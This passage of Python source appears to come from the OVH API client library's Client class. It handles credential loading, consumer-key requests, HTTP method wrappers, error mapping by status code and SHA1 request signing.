All low level request logic including signing and error handling takes place
in :py:func:`Client.call` function. Convenient wrappers
:py:func:`Client.get` :py:func:`Client.post`, :py:func:`Client.put`,
:py:func:`Client.delete` should be used instead. :py:func:`Client.post`,
:py:func:`Client.put` both accept arbitrary list of keyword arguments
mapped to ``data`` param of :py:func:`Client.call`.
Example usage:
.. code:: python
from ovh import Client, APIError
REGION = 'ovh-eu'
APP_KEY="<application key>"
APP_SECRET="<application secret key>"
CONSUMER_KEY="<consumer key>"
client = Client(REGION, APP_KEY, APP_SECRET, CONSUMER_KEY)
try:
print client.get('/me')
except APIError as e:
print "Ooops, failed to get my info:", e.msg
"""
def __init__(self, endpoint=None, application_key=None,
application_secret=None, consumer_key=None, timeout=TIMEOUT,
config_file=None):
"""
Creates a new Client. No credential check is done at this point.
The ``application_key`` identifies your application while
``application_secret`` authenticates it. On the other hand, the
``consumer_key`` uniquely identifies your application's end user without
requiring his personal password.
If any of ``endpoint``, ``application_key``, ``application_secret``
or ``consumer_key`` is not provided, this client will attempt to locate
from them from environment, ~/.ovh.cfg or /etc/ovh.cfg.
See :py:mod:`ovh.config` for more information on supported
configuration mechanisms.
``timeout`` can either be a float or a tuple. If it is a float it
sets the same timeout for both connection and read. If it is a tuple
connection and read timeout will be set independently. To use the
latter approach you need at least requests v2.4.0. Default value is
180 seconds for connection and 180 seconds for read.
:param str endpoint: API endpoint to use. Valid values in ``ENDPOINTS``
:param str application_key: Application key as provided by OVH
:param str application_secret: Application secret key as provided by OVH
:param str consumer_key: uniquely identifies the application's end user
:param tuple timeout: Connection and read timeout for each request
:param float timeout: Same timeout for both connection and read
:raises InvalidRegion: if ``endpoint`` can't be found in ``ENDPOINTS``.
"""
# Load a custom config file if requested
if config_file is not None:
config.read(config_file)
# load endpoint
if endpoint is None:
endpoint = config.get('default', 'endpoint')
try:
self._endpoint = ENDPOINTS[endpoint]
except KeyError:
raise InvalidRegion("Unknow endpoint %s. Valid endpoints: %s",
endpoint, ENDPOINTS.keys())
# load keys
if application_key is None:
application_key = config.get(endpoint, 'application_key')
self._application_key = application_key
if application_secret is None:
application_secret = config.get(endpoint, 'application_secret')
self._application_secret = application_secret
if consumer_key is None:
consumer_key = config.get(endpoint, 'consumer_key')
self._consumer_key = consumer_key
# lazy load time delta
self._time_delta = None
# use a requests session to reuse HTTPS connections between requests
self._session = Session()
# Override default timeout
self._timeout = timeout
## high level API
@property
def time_delta(self):
"""
Request signatures are valid only for a short amount of time to mitigate
the risk of replay attacks, which requires a common time reference. This
function queries the endpoint's time and computes the delta.
This entrypoint does not require authentication.
This method is *lazy*. It will only load it once even though it is used
for each request.
.. note:: You should not need to use this property directly
:returns: time distance between local and server time in seconds.
:rtype: int
"""
if self._time_delta is None:
server_time = self.get('/auth/time', _need_auth=False)
self._time_delta = server_time - int(time.time())
return self._time_delta
def new_consumer_key_request(self):
"""
Create a new consumer key request. This is the recommended way to obtain
a new consumer key.
Full example:
>>> import ovh
>>> client = ovh.Client("ovh-eu")
>>> ck = client.new_consumer_key_request()
>>> ck.add_rules(ovh.API_READ_ONLY, "/me")
>>> ck.add_recursive_rules(ovh.API_READ_WRITE, "/sms")
>>> ck.request()
{
'state': 'pendingValidation',
'consumerKey': 'TnpZAd5pYNqxk4RhlPiSRfJ4WrkmII2i',
'validationUrl': 'https://eu.api.ovh.com/auth/?credentialToken=now2OOAVO4Wp6t7bemyN9DMWIobhGjFNZSHmixtVJM4S7mzjkN2L5VBfG96Iy1i0'
}
"""
return ConsumerKeyRequest(self)
def request_consumerkey(self, access_rules, redirect_url=None):
"""
Create a new "consumer key" identifying this application's end user. API
will return a ``consumerKey`` and a ``validationUrl``. The end user must
visit the ``validationUrl``, authenticate and validate the requested
``access_rules`` to link his account to the ``consumerKey``. Once this
is done, he may optionally be redirected to ``redirect_url`` and the
application can start using the ``consumerKey``.
The new ``consumerKey`` is automatically loaded into
``self._consumer_key`` and is ready to be used as soon as it is validated.
As signing requires a valid ``consumerKey``, the method does not require
authentication, only a valid ``applicationKey``
``access_rules`` is a list of the form:
.. code:: python
# Grant full, unrestricted API access
access_rules = [
{'method': 'GET', 'path': '/*'},
{'method': 'POST', 'path': '/*'},
{'method': 'PUT', 'path': '/*'},
{'method': 'DELETE', 'path': '/*'}
]
To request a new consumer key, you may use a code like:
.. code:: python
# Request RO, /me API access
access_rules = [
{'method': 'GET', 'path': '/me'},
]
# Request token
validation = client.request_consumerkey(access_rules)
print "Please visit", validation['validationUrl'], "to authenticate"
raw_input("and press Enter to continue...")
# Print nice welcome message
print "Welcome", client.get('/me')['firstname']
:param list access_rules: Mapping specifying requested privileges.
:param str redirect_url: Where to redirect end user upon validation.
:raises APIError: When ``self.call`` fails.
:returns: dict with ``consumerKey`` and ``validationUrl`` keys
:rtype: dict
"""
res = self.post('/auth/credential', _need_auth=False,
accessRules=access_rules, redirection=redirect_url)
self._consumer_key = res['consumerKey']
return res
## API shortcuts
def _canonicalize_kwargs(self, kwargs):
"""
If an API needs an argument colliding with a Python reserved keyword, it
can be prefixed with an underscore. For example, ``from`` argument of
``POST /email/domain/{domain}/redirection`` may be replaced by ``_from``
:param dict kwargs: input kwargs
:return dict: filtered kwargs
"""
arguments = {}
for k, v in kwargs.items():
if k[0] == '_' and k[1:] in keyword.kwlist:
k = k[1:]
arguments[k] = v
return arguments
def _prepare_query_string(self, kwargs):
"""
Boolean needs to be send as lowercase 'false' or 'true' in querystring.
This function prepares arguments for querystring and encodes them.
:param dict kwargs: input kwargs
:return string: prepared querystring
"""
arguments = {}
for k, v in kwargs.items():
if isinstance(v, bool):
v = str(v).lower()
arguments[k] = v
return urlencode(arguments)
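# For example (hypothetical arguments): {'dryRun': True, 'size': 3}
# is encoded as "dryRun=true&size=3" (parameter order may vary).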
def get(self, _target, _need_auth=True, **kwargs):
"""
'GET' :py:func:`Client.call` wrapper.
Query string parameters can be set either directly in ``_target`` or as
keyword arguments. If an argument collides with a Python reserved
keyword, prefix it with a '_'. For instance, ``from`` becomes ``_from``.
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
if kwargs:
kwargs = self._canonicalize_kwargs(kwargs)
query_string = self._prepare_query_string(kwargs)
if '?' in _target:
_target = '%s&%s' % (_target, query_string)
else:
_target = '%s?%s' % (_target, query_string)
return self.call('GET', _target, None, _need_auth)
def put(self, _target, _need_auth=True, **kwargs):
"""
'PUT' :py:func:`Client.call` wrapper
Body parameters can be set either directly in ``_target`` or as keyword
arguments. If an argument collides with a Python reserved keyword,
prefix it with a '_'. For instance, ``from`` becomes ``_from``.
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
kwargs = self._canonicalize_kwargs(kwargs)
return self.call('PUT', _target, kwargs, _need_auth)
def post(self, _target, _need_auth=True, **kwargs):
"""
'POST' :py:func:`Client.call` wrapper
Body parameters can be set either directly in ``_target`` or as keyword
arguments. If an argument collides with a Python reserved keyword,
prefix it with a '_'. For instance, ``from`` becomes ``_from``.
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
kwargs = self._canonicalize_kwargs(kwargs)
return self.call('POST', _target, kwargs, _need_auth)
def delete(self, _target, _need_auth=True):
"""
'DELETE' :py:func:`Client.call` wrapper
:param string _target: API method to call
:param string _need_auth: If True, send authentication headers. This is
the default
"""
return self.call('DELETE', _target, None, _need_auth)
## low level helpers
def call(self, method, path, data=None, need_auth=True):
"""
Low level call helper. If ``consumer_key`` is not ``None``, inject
authentication headers and sign the request.
Request signature is a sha1 hash on following fields, joined by '+'
- application_secret
- consumer_key
- METHOD
- full request url
- body
- server current time (takes time delta into account)
:param str method: HTTP verb. Usually one of GET, POST, PUT, DELETE
:param str path: api entrypoint to call, relative to endpoint base path
:param data: any json serializable data to send as request's body
:param boolean need_auth: if False, bypass signature
:raises HTTPError: when underlying request failed for network reason
:raises InvalidResponse: when API response could not be decoded
"""
# attempt request
try:
result = self.raw_call(method=method, path=path, data=data, need_auth=need_auth)
except RequestException as error:
raise HTTPError("Low HTTP request failed error", error)
status = result.status_code
# attempt to decode and return the response
try:
json_result = result.json()
except ValueError as error:
raise InvalidResponse("Failed to decode API response", error)
# error check
if status >= 100 and status < 300:
return json_result
elif status == 403 and json_result.get('errorCode') == 'NOT_GRANTED_CALL':
raise NotGrantedCall(json_result.get('message'),
response=result)
elif status == 403 and json_result.get('errorCode') == 'NOT_CREDENTIAL':
raise NotCredential(json_result.get('message'),
response=result)
elif status == 403 and json_result.get('errorCode') == 'INVALID_KEY':
raise InvalidKey(json_result.get('message'), response=result)
elif status == 403 and json_result.get('errorCode') == 'INVALID_CREDENTIAL':
raise InvalidCredential(json_result.get('message'),
response=result)
elif status == 403 and json_result.get('errorCode') == 'FORBIDDEN':
raise Forbidden(json_result.get('message'), response=result)
elif status == 404:
raise ResourceNotFoundError(json_result.get('message'),
response=result)
elif status == 400:
raise BadParametersError(json_result.get('message'),
response=result)
elif status == 409:
raise ResourceConflictError(json_result.get('message'),
response=result)
elif status == 0:
raise NetworkError()
else:
raise APIError(json_result.get('message'), response=result)
def raw_call(self, method, path, data=None, need_auth=True):
"""
Lowest level call helper. If ``consumer_key`` is not ``None``, inject
authentication headers and sign the request.
Will return a vendored ``requests.Response`` object or let any
``requests`` exception pass through.
Request signature is a sha1 hash on following fields, joined by '+'
- application_secret
- consumer_key
- METHOD
- full request url
- body
- server current time (takes time delta into account)
:param str method: HTTP verb. Usually one of GET, POST, PUT, DELETE
:param str path: api entrypoint to call, relative to endpoint base path
:param data: any json serializable data to send as request's body
:param boolean need_auth: if False, bypass signature
"""
body = ''
target = self._endpoint + path
headers = {
'X-Ovh-Application': self._application_key
}
# include payload
if data is not None:
headers['Content-type'] = 'application/json'
body = json.dumps(data)
# sign request. Never sign 'time' or we will recurse infinitely
if need_auth:
if not self._application_secret:
raise InvalidKey("Invalid ApplicationSecret '%s'" %
self._application_secret)
if not self._consumer_key:
raise InvalidKey("Invalid ConsumerKey '%s'" %
self._consumer_key)
now = str(int(time.time()) + self.time_delta)
signature = hashlib.sha1()
signature.update("+".join([
self._application_secret, self._consumer_key,
method.upper(), target,
body,
now
]).encode('utf-8'))
headers['X-Ovh-Consumer'] = self._consumer_key
headers['X-Ovh-Timestamp'] = now
headers['X-Ovh-Signature'] = "$1$" + signature.hexdigest()
return self._session.request(method, target, headers=headers,
data=body, timeout=self._timeout)
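# A minimal sketch of the signature scheme described in raw_call's docstring;
# every value below is a made-up placeholder, not a real key or timestamp:
#
#   import hashlib
#   now = "1457018875"
#   signature = hashlib.sha1("+".join([
#       "my_application_secret", "my_consumer_key",
#       "GET", "https://eu.api.ovh.com/1.0/me",
#       "",                      # empty body for a GET request
#       now,
#   ]).encode('utf-8'))
#   x_ovh_signature = "$1$" + signature.hexdigest()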
|